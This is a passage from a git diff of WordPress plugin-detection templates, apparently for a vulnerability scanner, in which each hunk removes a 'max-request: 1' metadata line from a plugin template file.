   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
